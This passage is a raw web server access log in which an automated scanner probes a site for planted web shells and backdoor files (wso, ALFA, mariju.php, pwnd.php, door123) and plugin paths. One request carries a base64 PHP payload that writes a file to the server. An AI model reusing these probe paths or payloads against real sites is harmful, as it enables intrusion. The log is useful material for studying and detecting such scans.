AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:17:43:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:17:43:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:17:43:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:46:01 -0400] "GET /wp-admin/images/my1.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:46:10 -0400] "GET /wp-config-sample.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:46:11 -0400] "GET /wp-includes/Requests/Cookie/my1.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:46:13 -0400] "GET /my1.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:46:18 -0400] "GET /cgi-bin/my1.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:46:23 -0400] "GET /.well-known/acme-challenge/my1.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 86.8.204.43 - - [12/Aug/2025:17:46:46 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:17:46:46 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:17:46:46 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:17:46:46 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:48:45 -0400] "GET /images/mariju.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:49:07 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:49:11 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:49:12 -0400] "GET /wso112233.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:49:27 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:50:03 -0400] "GET /cong.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:50:18 -0400] "GET /repeater.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:50:35 -0400] "GET /.well-known/acme-challenge/ HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 31.13.103.5 - - [12/Aug/2025:17:50:49 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:17:54:22 -0400] "GET //wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:54:51 -0400] "GET /wp-includes/php-compat/mariju.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:55:07 -0400] "GET //wp-content/plugins/wp-help/index.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:56:16 -0400] "GET /wp-content/shell20211028.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:56:31 -0400] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:17:57:02 -0400] "GET //wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:17:57:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:17:57:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:17:57:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:17:57:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:17:58:28 -0400] "GET /ioxi01.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:17:58:28 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:17:58:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:17:58:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:17:58:29 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:17:58:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:17:58:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:17:58:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:17:58:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 31.13.115.5 - - [12/Aug/2025:17:58:56 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:18:00:49 -0400] "GET /wp-admin/maint/mariju.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:00:53 -0400] "GET /wp-content/plugins/woocommerce-payments/readme.txt HTTP/1.1" 301 285 "-" "python-requests/2.32.4" 94.16.113.252 - - [12/Aug/2025:18:00:55 -0400] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/6.1.3035.111." 94.16.113.252 - - [12/Aug/2025:18:00:56 -0400] "POST / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/6.1.3035.111." 212.143.94.239 - - [12/Aug/2025:18:01:12 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 68.183.245.101 - - [12/Aug/2025:18:01:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:18:01:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:18:01:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:18:01:23 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:01:50 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:01:52 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:02:04 -0400] "GET /.well-known/acme-challenge/license.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:02:54 -0400] "GET /wp-content/plugins/envato-market/inc/class-envato-market-api.php HTTP/1.1" 301 299 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:03:24 -0400] "GET /wzy.php?action=door123 HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:03:56 -0400] "GET //wp-content/updraft/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:04:13 -0400] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:04:27 -0400] "GET /wzy.php?action=door123 HTTP/1.1" 301 257 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:04:44 -0400] "GET /ALFA_DATA/ HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:04:48 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:04:53 -0400] "GET //wp-content/plugins/woocommerce-payments/readme.txt HTTP/1.1" 301 285 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:18:05:30 -0400] "GET /wzy.php?action=door123 HTTP/1.1" 301 257 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 146.190.11.185 - - [12/Aug/2025:18:05:42 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:18:05:42 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:18:05:42 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:18:05:42 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:06:28 -0400] "GET /wp-includes/ID3/mariju.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:07:59 -0400] "GET /worm0.PhP7 HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:08:00 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:08:47 -0400] "GET //wp-content/themes/intense/block-css.php?mode=upload HTTP/1.1" 301 286 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:09:24 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:10:45 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3FsamVqLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:10:49 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:10:53 -0400] "GET //wp-content/themes/hideo/network.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:11:23 -0400] "GET /class.api.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:12:33 -0400] "GET /top.php?action=door123 HTTP/1.1" 301 257 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:12:50 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:18:12:56 -0400] "GET /top.php?action=door123 HTTP/1.1" 301 257 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:13:11 -0400] "GET /lv.php HTTP/1.1" 301 241 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:18:13:21 -0400] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/6.1.3035.111." 209.38.125.40 - - [12/Aug/2025:18:13:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:18:13:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:18:13:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:18:13:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:14:00 -0400] "GET /alfanew.PhP7 HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:14:30 -0400] "GET /wp-admin/includes/mariju.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:18:15:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:18:15:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:18:15:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:18:15:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:18:15:53 -0400] "GET /Mshell.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:16:25 -0400] "GET /wso112233.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:17:25 -0400] "GET /.well-known/acme-challenge/atomlib.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:18:43 -0400] "GET /504.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:20:54 -0400] "POST / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/6.1.3035.111." 94.16.113.252 - - [12/Aug/2025:18:21:39 -0400] "GET /sites/all/libraries/elfinder/connectors/php/connector.php HTTP/1.1" 301 292 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:22:13 -0400] "GET /gawean.PhP7 HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:22:21 -0400] "GET /.well-known/pki-validation/mariju.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like 